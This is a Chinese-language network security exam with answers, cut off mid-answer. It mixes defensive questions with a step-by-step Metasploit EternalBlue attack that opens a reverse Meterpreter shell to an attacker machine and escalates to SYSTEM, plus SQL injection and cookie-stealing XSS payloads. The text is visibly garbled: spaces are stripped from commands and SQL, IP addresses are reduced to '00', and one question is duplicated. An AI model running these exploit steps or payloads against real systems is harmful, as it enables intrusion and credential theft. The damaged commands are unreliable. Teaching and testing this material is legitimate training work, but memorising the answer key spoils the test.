2026年网络攻防试题及答案

2026年网络攻防试题及答案一、单项选择题（每题2分，共20分）1.某电商平台用户登录页面接受用户输入账号（username）和密码（password），后端PHP代码对输入参数仅进行trim()处理后直接拼接SQL查询语句："SELECTFROMusersWHEREusername='{$_POST['username']}'ANDpassword='{$_POST['password']}';"。该场景最可能存在哪种安全漏洞？1.某电商平台用户登录页面接受用户输入账号（username）和密码（password），后端PHP代码对输入参数仅进行trim()处理后直接拼接SQL查询语句："SELECTFROMusersWHEREusername='{$_POST['username']}'ANDpassword='{$_POST['password']}';"。该场景最可能存在哪种安全漏洞？A.CSRFB.SQL注入C.XSSD.文件包含答案：B解析：输入参数未经过任何SQL转义或预处理（如PDO预处理语句），直接拼接至SQL查询中，攻击者可通过输入"username'OR'1'='1"等payload使查询逻辑被篡改，属于典型的SQL注入漏洞。2.以下哪种攻击方式属于APT（高级持续性威胁）的典型特征？A.利用0day漏洞对特定政府机构进行持续6个月的定向攻击B.大规模扫描互联网开放端口并植入勒索软件C.通过钓鱼邮件向随机用户发送恶意文档D.利用已知漏洞对企业官网进行挂马答案：A解析：APT强调针对性（特定目标）、持续性（长期攻击）和高级性（可能使用0day），选项A符合这三个特征；其他选项多为批量或短期攻击。3.某企业网络中，管理员发现核心交换机日志显示大量ICMP请求包（类型8）发往广播地址，目标主机响应包（类型0）异常增多，导致网络拥塞。此现象最可能是哪种攻击？A.SYNFloodB.DNS放大攻击C.ICMPSmurf攻击D.ARP欺骗答案：C解析：ICMPSmurf攻击通过向广播地址发送伪造源IP的ICMP请求（类型8），诱使大量主机响应（类型0），导致目标IP被洪水般的响应包淹没；SYNFlood是TCP层攻击，DNS放大利用DNS递归查询，ARP欺骗针对二层地址解析。二、简答题（每题10分，共30分）1.简述如何区分存储型XSS与反射型XSS，并各举一例。答案：存储型XSS的恶意脚本会被服务器永久存储（如存入数据库），当其他用户访问包含该数据的页面时触发；反射型XSS的脚本仅在当前请求-响应中临时反射，不会持久存储。示例：存储型XSS：用户评论功能未过滤输入，攻击者提交"<script>alert(1)</script>"作为评论，后续所有查看该评论的用户都会触发弹窗；反射型XSS：搜索功能将用户输入的关键词直接回显在页面中（如/search?keyword=<script>alert(1)</script>），仅当用户点击该链接时触发。2.列举Windows系统中排查后门程序的至少3种方法，并说明原理。答案：（1）任务管理器/任务查看器：检查异常进程（如非系统目录下的可执行文件、高CPU/内存占用、无数字签名的进程），原理是恶意程序通常会以进程形式运行；（2）系统服务（services.msc）：查看是否存在异常服务（如描述模糊、可执行路径指向可疑目录），原理是后门可能通过注册为服务实现持久化；（3）WMI事件订阅（wmiceventfilterlistfull）：检查是否存在异常的WMI事件订阅，原理是高级后门可能利用WMI实现触发执行；（4）注册表（regedit）：查看启动项（如HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run），原理是后门常通过注册表启动项实现开机自启。3.说明零信任架构（ZeroTrust）的核心原则，并简述其在网络防御中的应用场景。答案：核心原则：“永不信任，始终验证”，即默认不信任网络内外部的任何设备、用户或流量，必须通过持续验证身份、设备状态、访问上下文等信息来授权访问。应用场景示例：企业员工远程访问内部系统时，需验证用户身份（如多因素认证）、设备安全状态（如安装最新补丁、未感染恶意软件）、访问位置（如是否来自高风险地区），仅当所有条件满足时才允许访问特定资源，且访问权限最小化（如仅开放所需的数据库端口，而非整个内网）。三、操作题（每题25分，共50分）1.模拟场景：某企业内部有一台IP为00的WindowsServer2016主机，存在未修复的MS17-010（永恒之蓝）漏洞。请使用Metasploit框架完成以下操作：（1）扫描该主机是否存在MS17-010漏洞；（2）利用漏洞获取主机System权限的Shell；（3）简述验证是否成功获取System权限的方法。答案：（1）扫描漏洞：启动Metasploit：msfconsole加载扫描模块：useauxiliary/scanner/smb/smb_ms17_010设置目标IP：setRHOSTS00执行扫描：run扫描结果中若显示“HostislikelyVULNERABLE”，则确认存在漏洞。（2）利用漏洞获取Shell：加载利用模块：useexploit/windows/smb/ms17_010_eternalblue设置目标IP：setRHOSTS00设置payload（如反向Shell）：setpayloadwindows/x64/meterpreter/reverse_tcp设置本地监听IP和端口：setLHOST00（攻击机IP），setLPORT4444执行攻击：exploit成功后将获得meterpreter会话。（3）验证System权限：在meterpreter会话中执行getuid命令，输出应为“NTAUTHORITY\SYSTEM”；或执行shell命令进入CMD，运行whoami，输出“ntauthority\system”即表示成功。2.分析以下HTTP请求日志，指出其中存在的攻击行为，并说明判断依据及可能的危害。日志内容：[01/Jan/2026:14:30:00+0800]"GET/userinfo?uid=1UNIONSELECT1,version(),3-HTTP/1.1"2001234[01/Jan/2026:14:30:05+0800]"POST/commentHTTP/1.1"200567Content-Length:34Content-Type:application/x-www-form-urlencodedBody:content=<script>document.cookie=document.cookie;window.location='/?c='+document.cookie</script>答案：（1）第一条GET请求存在SQL注入攻击：判断依据：URL参数uid的值包含“UNIONSELECT1,version(),3--”，这是典型的SQL注入payload，用于获取数据库版本信息；危害：攻击者可通过此漏洞进一步提取数据库中的用户信息、敏感数据，甚至执行任意SQL命令（如删除